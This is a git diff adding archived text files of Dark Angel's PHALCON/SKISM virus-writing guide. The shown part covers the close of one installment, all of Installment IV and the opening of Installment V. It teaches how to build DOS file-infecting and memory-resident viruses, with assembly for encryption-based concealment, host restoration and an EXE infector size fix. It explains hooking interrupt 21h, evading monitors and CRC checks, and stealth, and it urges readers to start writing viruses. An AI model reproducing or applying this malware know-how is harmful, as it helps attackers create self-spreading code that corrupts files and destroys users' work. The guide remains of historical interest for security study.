+  unencrypted.   Through code-moving  techniques, it  is possible to copy the
+  infection mechanism  to the  heap (memory location past the end of the file
+  and before  the stack).   All  that is required is a few MOVSW instructions
+  and one  JMP.   First the  encryption routine  must  be  copied,  then  the
+  writing, then  the decryption,  then the  RETurn back  to the program.  For
+  example:
+  
+       lea si, [bp+encryption_routine]
+       lea di, [bp+heap]
+       mov cx, encryption_routine_size
+       push si
+       push cx
+       rep movsb
+  
+       lea si, [bp+writing_routine]
+       mov cx, writing_routine_size
+       rep movsb
+  
+       pop cx
+       pop si
+       rep movsb
+  
+       mov al, 0C3h                             ; Tack on a near return
+       stosb
+  
+       call [bp+heap]
+  
+  Although most  virii, for  simplicity's sake, use the same routine for both
+  encryption  and  decryption,  the  above  code  shows  this  is  completely
+  unnecessary.   The only  modification of  the above code for inclusion of a
+  separate decryption  routine is to take out the PUSHes and replace the POPs
+  with the appropriate LEA si and MOV cx.
+  
+  Original encryption  routines, while  interesting, might  not be  the best.
+  Stolen encryption  routines are  the best,  especially  those  stolen  from
+  encrypted shareware  programs!   Sydex is notorious for using encryption in
+  their shareware  programs.   Take a  look at  a  shareware  program's  puny
+  encryption and  feel free  to copy  it into your own.  Hopefully, the anti-
+  viral developers  will create  a scan string which will detect infection by
+  your virus in shareware products simply because the encryption is the same.
+  
+  Note that  this is  not a  full treatment  of concealment routines.  A full
+  text file could be written on encryption/decryption techniques alone.  This
+  is only  the simplest  of all  possible encryption techniques and there are
+  far more  concealment techniques  available.  However, for the beginner, it
+  should suffice.
+  
+  ��������������
+  THE DISPATCHER
+  ��������������
+  The dispatcher  is the  portion of the virus which restores control back to
+  the infected  program.    The  dispatchers  for  EXE  and  COM  files  are,
+  naturally, different.
+  
+  In COM  files, you  must restore  the bytes  which were overwritten by your
+  virus and  then transfer  control back  to CS:100h,  which is where all COM
+  files are initially loaded.
+  
+  RestoreCOM:
+       mov di, 100h                     ; We are copying to the beginning
+       lea si, [bp+savebuffer]          ; We are copying from our buffer
+       push di                          ; Save offset for return (100h)
+       movsw                            ; Mo efficient than mov cx, 3, movsb
+       movsb                            ; Alter to meet your needs
+       retn                             ; A JMP will also work
+  
+  EXE files  require simply  the restoration of the stack segment/pointer and
+  the code segment/instruction pointer.
+  
+  ExeReturn:
+          mov     ax, es                           ; Start at PSP segment
+          add     ax, 10h                          ; Skip the PSP
+          add     word ptr cs:[bp+ExeWhereToJump+2], ax
+          cli
+          add     ax, word ptr cs:[bp+StackSave+2] ; Restore the stack
+          mov     ss, ax
+          mov     sp, word ptr cs:[bp+StackSave]
+          sti
+          db      0eah                             ; JMP FAR PTR SEG:OFF
+  ExeWhereToJump:
+          dd      0
+  StackSave:
+          dd      0
+  
+  ExeWhereToJump2 dd 0
+  StackSave2      dd 0
+  
+  Upon  infection,   the  initial   CS:IP  and  SS:SP  should  be  stored  in
+  ExeWhereToJump2 and StackSave2, respectively.  They should then be moved to
+  ExeWhereToJump and  StackSave before  restoration of  the  program.    This
+  restoration may be easily accomplished with a series of MOVSW instructions.
+  
+  Some like  to clear all the registers prior to the JMP/RET, i.e. they issue
+  a bunch  of XOR  instructions.   If you  feel happy  and wish to waste code
+  space, you are welcome to do this, but it is unnecessary in most instances.
+  
+  ��������
+  THE BOMB
+  ��������
+  
+    "The horror!  The horror!"
+       - Joseph Conrad, The Heart of Darkness
+  
+  What goes through the mind of a lowly computer user when a virus activates?
+  What terrors  does the unsuspecting victim undergo as the computer suddenly
+  plays a  Nazi tune?  How awful it must be to lose thousands of man-hours of
+  work in an instant!
+  
+  Actually, I  do not  support wanton destruction of data and disks by virii.
+  It serves  no purpose  and usually  shows little imagination.  For example,
+  the world-famous Michelangelo virus did nothing more than overwrite sectors
+  of the  drive with  data taken at random from memory.  How original.  Yawn.
+  Of course,  if you  are hell-bent  on destruction, go ahead and destroy all
+  you want,  but just  remember that this portion of the virus is usually the
+  only part  seen by  "end-users" and distinguishes it from others.  The best
+  examples to date include: Ambulance Car, Cascade, Ping Pong, and Zero Hunt.
+  Don't forget the PHALCON/SKISM line, especially those by me (I had to throw
+  in a plug for the group)!
+  
+  As you  can see,  there's no  code to  speak of in this section.  Since all
+  bombs should be original, there isn't much point of putting in the code for
+  one, now  is there!   Of course, some virii don't contain any bomb to speak
+  of.   Generally speaking,  only those  under about  500 bytes  lack  bombs.
+  There is no advantage of not having a bomb other than size considerations.
+  
+  ���������
+  MEA CULPA
+  ���������
+  I regret  to inform  you that  the  EXE  infector  presented  in  the  last
+  installment was  not quite  perfect.   I admit  it.   I made  a mistake  of
+  colossal proportions   The  calculation of  the file size and file size mod
+  512 was screwed up.  Here is the corrected version:
+  
+  ; On entry, DX:AX hold the NEW file size
+  
+          push    ax                          ; Save low word of filesize
+          mov     cl, 9                       ; 2^9 = 512
+          shr     ax, cl                      ; / 512
+          ror     dx, cl                      ; / 512 (sort of)
+          stc                                 ; Check EXE header description
+                                              ; for explanation of addition
+          adc     dx, ax                      ; of 1 to the DIV 512 portion
+          pop     ax                          ; Restore low word of filesize
+          and     ah, 1                       ; MOD 512
+  
+  This results  in the file size / 512 + 1 in DX and the file size modulo 512
+  in AX.   The  rest remains  the same.  Test your EXE infection routine with
+  Microsoft's LINK.EXE,  since it  won't run  unless  the  EXE  infection  is
+  perfect.
+  
+  I have  saved you  the trouble  and smacked myself upside the head for this
+  dumb error.
+  
+  ���������������
+  TIPS AND TRICKS
+  ���������������
+  So now  all the  parts of  the nonresident  virus have been covered.  Yet I
+  find myself  left with several more K to fill.  So, I shall present several
+  simple techniques anyone can incorporate into virii to improve efficiency.
+  
+  1.   Use the heap
+       The heap  is the memory area between the end of code and the bottom of
+       the stack.   It can be conveniently treated as a data area by a virus.
+       By moving  variables to the heap, the virus need not keep variables in
+       its code,  thereby reducing  its length.  Note that since the contents
+       heap are  not part  of the  virus, only  temporary variables should be
+       kept there,  i.e. the  infection routine  should not count the heap as
+       part of  the virus as that would defeat the entire purpose of its use.
+       There are two ways of using the heap:
+       
+       ; First method
+       
+       EndOfVirus:
+       Variable1 equ $
+       Variable2 equ Variable1 + LengthOfVariable1
+       Variable3 equ Variable2 + LengthOfVariable2
+       Variable4 equ Variable3 + LengthOfVariable3
+       
+       ; Example of first method
+       
+       EndOfVirus:
+       StartingDirectory = $
+       TemporaryDTA      = StartingDirectory + 64
+       FileSize          = TemporaryDTA + 42
+       Flag              = FileSize + 4
+       
+       ; Second method
+       
+       EndOfVirus:
+       Variable1 db LengthOfVariable1 dup (?)
+       Variable2 db LengthOfVariable2 dup (?)
+       Variable3 db LengthOfVariable3 dup (?)
+       Variable4 db LengthOfVariable4 dup (?)
+       
+       ; Example of second method
+       EndOfVirus:
+       StartingDirectory db 64 dup (?)
+       TemporaryDTA      db 42 dup (?)
+       FileSize          dd ?
+       Flag              db ?
+       
+       The two  methods differ  slightly.   By using  the first  method,  you
+       create a  file which  will be  the exact  length of  the  virus  (plus
+       startup  code).     However,  when  referencing  the  variables,  size
+       specifications such as BYTE PTR, WORD PTR, DWORD PTR, etc. must always
+       be used  or the  assembler will  become befuddled.   Secondly,  if the
+       variables need  to be  rearranged for some reason, the entire chain of
+       EQUates will  be destroyed  and must  be rebuilt.   Virii  coded  with
+       second method  do not need size specifications, but the resulting file
+       will be  larger than  the actual size of the virus.  While this is not
+       normally a  problem, depending on the reinfection check, the virus may
+       infect the  original file  when run.   This  is not  a big disability,
+       especially considering the advantages of this method.
+       
+       In any  case, the  use of  the heap  can greatly  lessen the effective
+       length of the virus code and thereby make it much more efficient.  The
+       only thing  to watch  out for  is infecting  large COM files where the
+       heap will  "wrap around"  to offset  0 of the same segment, corrupting
+       the PSP.   However,  this problem is easily avoided.  When considering
+       whether a  COM file is too large to infect for this reason, simply add
+       the temporary variable area size to the virus size for the purposes of
+       the check.
+  
+  2.   Use procedures
+       Procedures are  helpful in  reducing the  size of  the virus, which is
+       always a  desired goal.   Only  use procedures if they save space.  To
+       determine the amount of bytes saved by the use of a procedure, use the
+       following formula:
+       
+       Let PS = the procedure size, in bytes
+       bytes saved = (PS - 4) * number invocations - PS
+       
+       For example, the close file procedure,
+       
+       close_file:
+         mov ah, 3eh      ; 2 bytes
+         int 21h          ; 2 bytes
+         ret              ; 1 byte
+                          ; PS = 2+2+1 = 5
+       
+       is only  viable if  it is used 6 or more times, as (5-4)*6 - 5 = 1.  A
+       whopping savings of one (1) byte!  Since no virus closes a file in six
+       different places,  the close  file procedure  is clearly  useless  and
+       should be avoided.
+       
+       Whenever  possible,  design  the  procedures  to  be  as  flexible  as
+       possible.   This is the chief reason why Bulgarian coding is so tight.
+       Just take  a look  at the source for Creeping Death.  For example, the
+       move file pointer procedure:
+       
+       go_eof:
+         mov al, 2
+       move_fp:
+         xor dx, dx
+       go_somewhere:
+         xor cx, cx
+         mov ah, 42h
+         int 21h
+         ret
+       
+       The function  was build  with flexibility  in mind.   With  a CALL  to
+       go_eof, the  procedure will  move the  file pointer  to the end of the
+       file.   A CALL  to move_fp  with AL set to 0, the file pointer will be
+       reset.   A CALL  to go_somewhere  with DX and AL set, the file pointer
+       may be  moved anywhere  within the  file.   If the  function  is  used
+       heavily, the savings could be enormous.
+  
+  3.   Use a good assembler and debugger
+       The best  assembler I have encountered to date is Turbo Assembler.  It
+       generates tight  code extremely  quickly.    Use  the  /m2  option  to
+       eliminate all  placeholder NOPs  from the  code.   The advantages  are
+       obvious - faster development and smaller code.
+       
+       The best  debugger is  also made  by Borland,  the king of development
+       tools.   Turbo Debugger  has so many features that you might just want
+       to buy  it so  you can  read the  manual!  It can bypass many debugger
+       traps with ease and is ideal for testing.  Additionally, this debugger
+       has 286  and 386  specific protected  mode versions, each of which are
+       even more powerful than their real mode counterparts.
+  
+  4.   Don't use MOV instead of LEA
+       When writing your first virus, you may often forget to use LEA instead
+       of MOV  when loading  offsets.  This is a serious mistake and is often
+       made by  beginning virus  coders.   The  harmful  effects  of  such  a
+       grevious error  are immediately obvious.  If the virus is not working,
+       check for  this bug.   It's  almost as hard to catch as a NULL pointer
+       error in C.
+  
+  5.   Read the latest issues of 40Hex
+       40Hex, PHALCON/SKISM's  official journal of virus techniques and news,
+       is a publication not to be missed by any self-respecting virus writer.
+       Each issue  contains techniques  and source code, designed to help all
+       virus writers,  be they  beginners or  experts.  Virus-related news is
+       also published.  Get it, read it, love it, eat it!
+  
+  ������
+  SO NOW
+  ������
+  you have  all the  code and information sufficient to write a viable virus,
+  as well  as a  wealth of  techniques to  use.   So stop  reading and  start
+  writing!   The only  way to  get better  is through practise.  After two or
+  three tries, you should be well on your way to writing good virii.
diff --git a/textfiles.com/virus/ps-vir4.txt b/textfiles.com/virus/ps-vir4.txt
new file mode 100644
index 00000000..b2857207
--- /dev/null
+++ b/textfiles.com/virus/ps-vir4.txt
@@ -0,0 +1,377 @@
+      //==//  //  //  /||      //      //====  //==//  //|   //
+     //  //  //  //  //||     //      //      //  //  //||  //
+    //==//  //==//  //=||    //      //      //  //  // || //
+   //      //  //  //  ||   //      //      //  //  //  ||//
+  //      //  //  //   ||  //====  //====  //==//  //   ||/
+  
+     /====   // //     //  /====   /|   /|
+    //      // //     //  //      //|  //|
+    ===\   // //     //   ===\   //|| //||
+      //  //  \\    //      //  // ||// ||
+  ====/  //    \\  //   ====/  //  ||/  ||
+  
+  �������������������������������������������
+  DISCLAIMER: This file is 100% guaranteed to
+    exist.  The author makes no claims to the
+    existence or nonexistence of the reader.
+  �������������������������������������������
+      This space intentionally left blank.
+  �������������������������������������������
+  GREETS: Welcome home, Hellraiser!  Hello to
+    the rest of the PHALCON/SKISM crew: Count
+    Zero, Demogorgon, Garbageheap, as well as
+    everyone else I failed to mention.
+  �������������������������������������������
+  
+  Dark Angel's Clumpy Virus Writing Guide
+  ���� ������� ������ ����� ������� �����
+    "It's the cheesiest" - Kraft
+  
+  ��������������������������������������
+  INSTALLMENT IV: RESIDENT VIRII, PART I
+  ��������������������������������������
+  
+  Now that the topic of nonresident virii has been addressed, this series now
+  turns to  memory resident virii.  This installment covers the theory behind
+  this type  of virus,  although no  code  will  be  presented.    With  this
+  knowledge in  hand, you  can boldly  write memory  resident virii confident
+  that you are not fucking up too badly.
+  
+  ����������
+  INTERRUPTS
+  ����������
+  DOS kindly  provides us  with a powerful method of enhancing itself, namely
+  memory resident programs.  Memory resident programs allow for the extention
+  and alteration  of the normal functioning of DOS.  To understand how memory
+  resident programs  work, it  is necessary  to delve into the intricacies of
+  the interrupt  table.   The interrupt table is located from memory location
+  0000:0000 to  0000:0400h (or  0040:0000), just  below the  BIOS information
+  area.   It consists of 256 double words, each representing a segment:offset
+  pair.   When an interrupt call is issued via an INT instruction, two things
+  occur, in this order:
+  
+    1) The flags are pushed onto the stack.
+    2) A  far call  is issued  to the segment:offset located in the interrupt
+       table.
+  
+  To return  from an  interrupt, an  iret instruction  is  used.    The  iret
+  instruction reverses  the order  of the  int call.    It  performs  a  retf
+  followed by  a  popf.    This  call/return  procedure  has  an  interesting
+  sideeffect when  considering interrupt  handlers which return values in the
+  flags register.   Such handlers must directly manipulate the flags register
+  saved in the stack rather than simply directly manipulating the register.
+  
+  The processor  searches the  interrupt table for the location to call.  For
+  example, when  an interrupt  21h is  called,  the  processor  searches  the
+  interrupt table  to find  the address  of the  interrupt 21h  handler.  The
+  segment of this pointer is 0000h and the offset is 21h*4, or 84h.  In other
+  words, the interrupt table is simply a consecutive chain of 256 pointers to
+  interrupts, ranging  from interrupt 0 to interrupt 255.  To find a specific
+  interrupt handler,  load in  a double word segment:offset pair from segment
+  0, offset  (interrupt number)*4.  The interrupt table is stored in standard
+  Intel reverse double word format, i.e. the offset is stored first, followed
+  by the segment.
+  
+  For a  program to  "capture" an interrupt, that is, redirect the interrupt,
+  it must  change the  data in the interrupt table.  This can be accomplished
+  either by  direct manipulation of the table or by a call to the appropriate
+  DOS function.  If the program manipulates the table directly, it should put
+  this code  between a CLI/STI pair, as issuing an interrupt by the processor
+  while the  table is  half-altered could have dire consequences.  Generally,
+  direct manipulation  is the  preferable alternative,  since some  primitive
+  programs such  as FluShot+  trap the  interrupt 21h  call used  to set  the
+  interrupt and  will warn  the user  if any  "unauthorised" programs  try to
+  change the handler.
+  
+  An interrupt handler is a piece of code which is executed when an interrupt
+  is requested.  The interrupt may either be requested by a program or may be
+  requested by  the processor.   Interrupt  21h is  an example of the former,
+  while interrupt 8h is an example of the latter.  The system BIOS supplies a
+  portion of  the interrupt  handlers, with  DOS and other programs supplying
+  the rest.   Generally, BIOS interrupts range from 0h to 1Fh, DOS interrupts
+  range from 20h to 2Fh, and the rest is available for use by programs.
+  
+  When a  program wishes  to install  its own  code, it must consider several
+  factors.  First of all, is it supplanting or overlaying existing code, that
+  is to  say, is  there already an interrupt handler present?  Secondly, does
+  the program  wish to preserve the functioning of the old interrupt handler?
+  For example,  a program  which "hooks"  into the  BIOS clock tick interrupt
+  would definitely  wish to preserve the old interrupt handler.  Ignoring the
+  presence of  the old  interrupt handler  could lead  to disastrous results,
+  especially if previously-loaded resident programs captured the interrupt.
+  
+  A technique  used in  many interrupt  handlers is  called "chaining."  With
+  chaining, both  the new and the old interrupt handlers are executed.  There
+  are two primary methods for chaining: preexecution and postexecution.  With
+  preexecution chaining,  the old  interrupt handler is called before the new
+  one.   This is  accomplished via  a pseudo-INT  call consisting  of a pushf
+  followed by  a call  far ptr.   The new interrupt handler is passed control
+  when the  old one  terminates.   Preexecution chaining is used when the new
+  interrupt handler wishes to use the results of the old interrupt handler in
+  deciding the  appropriate action  to take.   Postexecution chaining is more
+  straightforward, simply  consisting of  a jmp  far ptr  instruction.   This
+  method doesn't  even require  an iret  instruction to be located in the new
+  interrupt handler!  When the jmp is executed, the new interrupt handler has
+  completed its  actions and  control is passed to the old interrupt handler.
+  This method  is used  primarily when  a program  wishes  to  intercept  the
+  interrupt call before DOS or BIOS gets a chance to process it.
+  
+  ����������������������������������������
+  AN INTRODUCTION TO DOS MEMORY ALLOCATION
+  ����������������������������������������
+  Memory allocation  is perhaps one of the most difficult concepts, certainly
+  the hardest to implement, in DOS.  The problem lies in the lack of official
+  documentation by  both Microsoft  and IBM.  Unfortunately, knowledge of the
+  DOS memory manager is crucial in writing memory-resident virii.
+  
+  When a  program asks DOS for more memory, the operating system carves out a
+  chunk of memory from the pool of unallocated memory.  Although this concept
+  is simple enough to understand, it is necessary to delve deeper in order to
+  have sufficient  knowledge to  write effective  memory-resident virii.  DOS
+  creates memory  control blocks  (MCBs) to  help itself  keep track of these
+  chunks of  memory.  MCBs are paragraph-sized areas of memory which are each
+  devoted to  keeping track of one particular area of allocated memory.  When
+  a program  requests memory,  one paragraph  for the  MCB  is  allocated  in
+  addition to  the memory  requested by  the program.   The  MCB lies just in
+  front of  the memory  it controls.   Visually,  a MCB  and its memory looks
+  like:
+  
+  ���������������������������������������������Ŀ
+  � MCB 1 � Chunk o' memory controlled by MCB 1 �
+  �����������������������������������������������
+  
+  When a  second section  of memory is requested, another MCB is created just
+  above the memory last allocated.  Visually:
+  
+  �����������������������������������Ŀ
+  � MCB 1 � Chunk 1 � MCB 2 � Chunk 2 �
+  �������������������������������������
+  
+  In other  words, the  MCBs are  "stacked" one  on top  of the other.  It is
+  wasteful to deallocate MCB 1 before MCB 2, as holes in memory develop.  The
+  structure for the MCB is as follows:
+  
+  Offset    Size Meaning
+  ������ ������� �������
+  0         BYTE 'M' or 'Z'
+  1         WORD Process ID (PSP of block's owner)
+  3         WORD Size in paragraphs
+  5      3 BYTES Reserved (Unused)
+  8      8 BYTES DOS 4+ uses this.  Yay.
+  
+  If the  byte at  offset 0 is 'M', then the MCB is not the end of the chain.
+  The 'Z'  denotes the  end of the MCB chain.  There can be more than one MCB
+  chain present  in memory  at once and this "feature" is used by virii to go
+  resident in high memory.  The word at offset 1 is normally equal to the PSP
+  of the  MCB's owner.   If  it is  0, it means that the block is free and is
+  available for  use by programs.  A value of 0008h in this field denotes DOS
+  as the  owner of  the block.   The  value at  offset 3 does NOT include the
+  paragraph allocated  for the  MCB.  It reflects the value passed to the DOS
+  allocation functions.   All  fields located after the block size are pretty
+  useless so you might as well ignore them.
+  
+  When a  COM file is loaded, all available memory is allocated to it by DOS.
+  When an  EXE file  is loaded,  the amount  of memory  specified in  the EXE
+  header is  allocated.   There is  both a  minimum and  maximum value in the
+  header.    Usually,  the  linker  will  set  the  maximum  value  to  FFFFh
+  paragraphs.  If the program wishes to allocate memory, it must first shrink
+  the main  chunk of  memory owned  by the  program to  the minimum required.
+  Otherwise, the pathetic attempt at memory allocation will fail miserably.
+  
+  Since programs  normally are  not supposed to manipulate MCBs directly, the
+  DOS memory  manager calls  (48h -  4Ah) all return and accept values of the
+  first program-usable  memory paragraph,  that is,  the paragraph  of memory
+  immediately after  the MCB.   It  is important  to keep  this in  mind when
+  writing MCB-manipulating code.
+  
+  �������������������������
+  METHODS OF GOING RESIDENT
+  �������������������������
+  There are a variety of memory resident strategies.  The first is the use of
+  the  traditional  DOS  interrupt  TSR  routines,  either  INT  27h  or  INT
+  21h/Function 31h.   These  routines are  undesirable  when  writing  virii,
+  because they  do not  return control  back to  the program after execution.
+  Additionally, they  show up  on "memory  walkers" such  as PMAP and MAPMEM.
+  Even a doorknob can spot such a blatant viral presence.
+  
+  The traditional  viral alternative  to using the standard DOS interrupt is,
+  of course, writing a new residency routine.  Almost every modern virus uses
+  a routine to "load high," that is, to load itself into the highest possible
+  memory location.   For  example, in  a 640K  system, the  virus would  load
+  itself just  under the  640K but above the area reserved by DOS for program
+  use.   Although this  is technically  not the high memory area, it shall be
+  referred to as such in the remainder of this file in order to add confusion
+  and general  chaos into this otherwise well-behaved file.  Loading high can
+  be easily accomplished through a series of interrupt calls for reallocation
+  and allocation.  The general method is:
+  
+  1.   Find the memory size
+  2.   Shrink the program's memory to the total memory size - virus size
+  3.   Allocate memory for the virus (this will be in the high memory area)
+  4.   Change the program's MCB to the end of the chain (Mark it with 'Z')
+  5.   Copy the virus to high memory
+  6.   Save the old interrupt vectors if the virus wishes to chain vectors
+  7.   Set the interrupt vectors to the appropriate locations in high memory
+  
+  When calculating  memory sizes,  remember that all sizes are in paragraphs.
+  The MCB  must also  be considered,  as it takes up one paragraph of memory.
+  The advantage  of this  method is  that it  does not, as a rule, show up on
+  memory walkers.  However, the total system memory as shown by such programs
+  as CHKDSK will decrease.
+  
+  A third alternative is no allocation at all.  Some virii copy themselves to
+  the memory just under 640K, but fail to allocate the memory.  This can have
+  disastrous consequences, as any program loaded by DOS can possibly use this
+  memory.   If it is corrupted, unpredictable results can occur.  Although no
+  memory loss  is shown  by CHKDSK,  the possible  chaos resulting  from this
+  method is  clearly unacceptable.   Some  virii use memory known to be free.
+  For example,  the top  of the  interrupt table or parts of video memory all
+  may be  used with  some assurance  that the  memory will  not be corrupted.
+  Once again, this technique is undesirable as it is extremely unstable.
+  
+  These techniques  are by  no means  the only  methods of residency.  I have
+  seen such  bizarre methods  as going  resident in  the  DOS  internal  disk
+  buffers.  Where there's memory, there's a way.
+  
+  It is  often desirable  to know  if the  virus is  already resident.    The
+  simplest method  of doing  this is  to write  a checking  function  in  the
+  interrupt handler  code.   For example, a call to interrupt 21h with the ax
+  register set  to 7823h  might  return  a  4323h  value  in  ax,  signifying
+  residency.   When using  this check,  it is  important to  ensure  that  no
+  possible conflicts  with either  other programs  or DOS  itself will occur.
+  Another method,  albeit a  costly process  in terms  of both  time and code
+  length, is  to check  each segment  in memory  for the  code indicating the
+  presence of the virus.  This method is, of course, undesirable, since it is
+  far, far  simpler to  code a  simple check  via the  interrupt handler.  By
+  using any  type of  check, the  virus need  not fear  going resident twice,
+  which would simply be a waste of memory.
+  
+  �������������
+  WHY RESIDENT?
+  �������������
+  Memory resident virii have several distinct advantages over runtime virii.
+     o Size
+       Memory resident virii are often smaller than their runtime brethern as
+       they do not need to include code to search for files to infect.
+     o Effectiveness
+       They are  often more  virulent, since  even the  DIR  command  can  be
+       "infected."   Generally, the standard technique is to infect each file
+       that is executed while the virus is resident.
+     o Speed
+       Runtime virii  infect before  a file is executed.  A poorly written or
+       large runtime  virus will  cause a  noticible delay  before  execution
+       easily spotted  by users.   Additionally,  it causes  inordinate  disk
+       activity which is detrimental to the lifespan of the virus.
+     o Stealth
+       The manipulation  of  interrupts  allows  for  the  implementation  of
+       stealth techniques,  such as  the hiding of changes in file lengths in
+       directory listings and on-the-fly disinfection.  Thus it is harder for
+       the average  user to detect the virus.  Additionally, the crafty virus
+       may even  hide from CRC checks, thereby obliterating yet another anti-
+       virus detection technique.
+  
+  �������������������������������
+  STRUCTURE OF THE RESIDENT VIRUS
+  �������������������������������
+  With the  preliminary information  out of  the way,  the discussion can now
+  shift to  more virus-related,  certainly  more  interesting  topics.    The
+  structure of  the memory resident virus is radically different from that of
+  the runtime virus.  It simply consists of a short stub used to determine if
+  the virus  is already  resident.   If it is not already in memory, the stuf
+  loads it  into memory through whichever method.  Finally, the stub restores
+  control to  the host  program.   The rest of the code of the resident virus
+  consists of interrupt handlers where the bulk of the work is done.
+  
+  The stub  is the only portion of the virus which needs to have delta offset
+  calculations.  The interrupt handler ideally will exist at a location which
+  will not  require such  mundane fixups.   Once  loaded, there  should be no
+  further use  of the  delta offset,  as the  location of  the  variables  is
+  preset.   Since the resident virus code should originate at offset 0 of the
+  memory block,  originate the source code at offset 0.  Do not include a jmp
+  to the  virus code  in the original carrier file.  When moving the virus to
+  memory, simply  move starting  from [bp+startvirus]  and the offsets should
+  work out  as they  are in  the source file.  This simplifies (and shortens)
+  the coding of the interrupt handlers.
+  
+  Several things  must be  considered in writing the interrupt handlers for a
+  virus.   First, the  virus must  preserve the registers.  If the virus uses
+  preexecution chaining,  it must  save the  registers after  the call to the
+  original handler.   If  the virus  uses  postexecution  chaining,  it  must
+  restore the original registers of the interrupt call before the call to the
+  original handler.   Second, it is more difficult, though not impossible, to
+  implement encryption  with memory  resident virii.   The problem is that if
+  the interrupt handler is encrypted, that interrupt handler cannot be called
+  before the  decryption function.  This can be a major pain in the ass.  The
+  cheesy way  out is  to simply  not include encryption.  I prefer the cheesy
+  way.   The noncheesy  readers out  there might  wish  to  have  the  memory
+  simultaneously hold  two copies  of the virus, encrypt the unused copy, and
+  use the  encrypted copy  as the  write buffer.   Of course, the virus would
+  then take twice the amount of memory it would normally require.  The use of
+  encryption is  a matter  of personal  choice and  cheesiness.  A sidebar to
+  preservation of interrupt handlers: As noted earlier, the flags register is
+  restored from  the stack.  It is important in preexecution chaining to save
+  the new  flags register  onto the  stack where  the old  flags register was
+  stored.
+  
+  Another important  factor to  consider  when  writing  interrupt  handlers,
+  especially those  of BIOS  interrupts, is  DOS's lack  of reentrance.  This
+  means that  DOS functions  cannot be  executed while DOS is in the midst of
+  processing an  interrupt request.   This  is because  DOS sets  up the same
+  stack pointer  each time it is called, and calling the second DOS interrupt
+  will cause  the processing  of one  to overwrite  the stack  of the  other,
+  causing  unpredictable,   but  often   terminal,  results.    This  applies
+  regardless of  which DOS  interrupts are  called, but it is especially true
+  for interrupt  21h, since  it is  often tempting  to use  it from within an
+  interrupt handler.   Unless  it is  certain that  DOS is  not processing  a
+  previous request,  do NOT  use a DOS function in the interrupt handler.  It
+  is possible  to use  the "lower"  interrupt 21h  functions without  fear of
+  corrupting the  stack, but  they are basically the useless ones, performing
+  functions easily  handled by  BIOS calls  or direct  hardware access.  This
+  entire discussion only applies to hooking non-DOS interrupts.  With hooking
+  DOS interrupts  comes the  assurance that  DOS is  not executing elsewhere,
+  since it  would then  be corrupting  its own  stack, which  would be a most
+  unfortunate occurence indeed.
+  
+  The most  common interrupt to hook is, naturally, interrupt 21h.  Interrupt
+  21h is called by just about every DOS program.  The usual strategy is for a
+  virus to  find potential files to infect by intercepting certain DOS calls.
+  The primary  functions to hook include the find first, find next, open, and
+  execute commands.   By  cleverly using  pre and  postexecution chaining,  a
+  virus can  easily find  the file  which was  found, opened, or executed and
+  infect it.   The  trick is simply finding the appropriate method to isolate
+  the filename.   Once that is done, the rest is essentially identical to the
+  runtime virus.
+  
+  When calling  interrupts hooked by the virus from the virus interrupt code,
+  make sure  that the  virus does  not trap  this particular  call,  lest  an
+  infinite loop  result.  For example, if the execute function is trapped and
+  the virus  wishes, for some reason, to execute a particular file using this
+  function, it  should NOT  use a  simple "int  21h" to do the job.  In cases
+  such as  this  where  the  problem  is  unavoidable,  simply  simulate  the
+  interrupt call with a pushf/call combination.
+  
+  The basic  structure of the interrupt handler is quite simple.  The handler
+  first screens  the registers  for either  an identification  call or  for a
+  trapped function  such as  execute.   If it  is not  one of  the above, the
+  handler throws control back to the original interrupt handler.  If it is an
+  identification request,  the handler  simply sets the appropriate registers
+  and returns  to the  calling program.   Otherwise, the virus must decide if
+  the request  calls for  pre or postexecution chaining.  Regardless of which
+  it uses,  the virus  must find  the filename  and use  that information  to
+  infect.   The filename  may be found either through the use of registers as
+  pointers or  by searching  thorugh certain  data structures,  such as FCBs.
+  The infection  routine is  the same  as that of nonresident virii, with the
+  exception of the guidelines outlined in the previous few paragraphs.
+  
+  ��������������
+  WHAT'S TO COME
+  ��������������
+  I apologise for the somewhat cryptic sentences used in the guide, but I'm a
+  programmer, not  a writer.   My  only suggestion is to read everything over
+  until it  makes sense.   I  decided to  pack this  issue of  the guide with
+  theory rather  than code.   In the next installment, I will present all the
+  code necessary to write a memory-resident virus, along with some techniques
+  which may be used.  However, all the information needed to write a resident
+  virii has  been included  in this  installment; it  is merely  a matter  of
+  implementation.  Have buckets o' fun!
+
diff --git a/textfiles.com/virus/ps-vir5.txt b/textfiles.com/virus/ps-vir5.txt
new file mode 100644
index 00000000..b49acd0d
--- /dev/null
+++ b/textfiles.com/virus/ps-vir5.txt
@@ -0,0 +1,441 @@
+      //==//  //  //  /||      //      //====  //==//  //|   //
+     //  //  //  //  //||     //      //      //  //  //||  //
+    //==//  //==//  //=||    //      //      //  //  // || //
+   //      //  //  //  ||   //      //      //  //  //  ||//
+  //      //  //  //   ||  //====  //====  //==//  //   ||/
+  
+     /====   // //     //  /====   /|   /|
+    //      // //     //  //      //|  //|
+    ===\   // //     //   ===\   //|| //||
+      //  //  \\    //      //  // ||// ||
+  ====/  //    \\  //   ====/  //  ||/  ||
+  
+  �����������������������������������������
+  DISCLAIMER: Why do I bother writing one??
+  �����������������������������������������
+  MO STUFF: Greets to all the Phalcon/Skism
+    crew,especially Garbageheap,Hellraiser,
+    Demogorgon,Lazarus Long,and Decimator.
+  �����������������������������������������
+  
+  Dark Angel's Chewy Virus Writing Guide
+  ���� ������� ����� ����� ������� �����
+    "Over 2 billion served"
+  
+  ����������������������������������������
+  INSTALLMENT V: RESIDENT VIRUSES, PART II
+  ����������������������������������������
+  
+  After reading  the the  Clumpy Guide, you should have at least some idea of
+  how to  code a  resident virus.  However, the somewhat vague descriptions I
+  gave may  have left  you in a befuddled state.  Hopefully, this installment
+  will clear the air.
+  
+  ���������
+  STRUCTURE
+  ���������
+  In case  you missed  it the last time, here is a quick, general overview of
+  the structure  of the  resident virus.   The  virus consists  of two  major
+  portions, the  loading stub  and the  interrupt handlers.  The loading stub
+  performs two  functions.  First, it redirects interrupts to the virus code.
+  Second, it causes the virus to go resident.  The interrupt handlers contain
+  the code  which  cause  file  infection.    Generally,  the  handlers  trap
+  interrupt 21h and intercept such calls as file execution.
+  
+  ������������
+  LOADING STUB
+  ������������
+  The loading  stub consists of two major portions, the residency routine and
+  the restoration  routine.   The latter portion, which handles the return of
+  control to  the original  file, is  identical as the one in the nonresident
+  virus.  I will briefly touch upon it here.
+  
+  By now  you  should  understand  thoroughly  the  theory  behind  COM  file
+  infection.   By simply  replacing the  first few  bytes,  transfer  can  be
+  controlled to  the virus.   The  trick in  restoring COM files is simply to
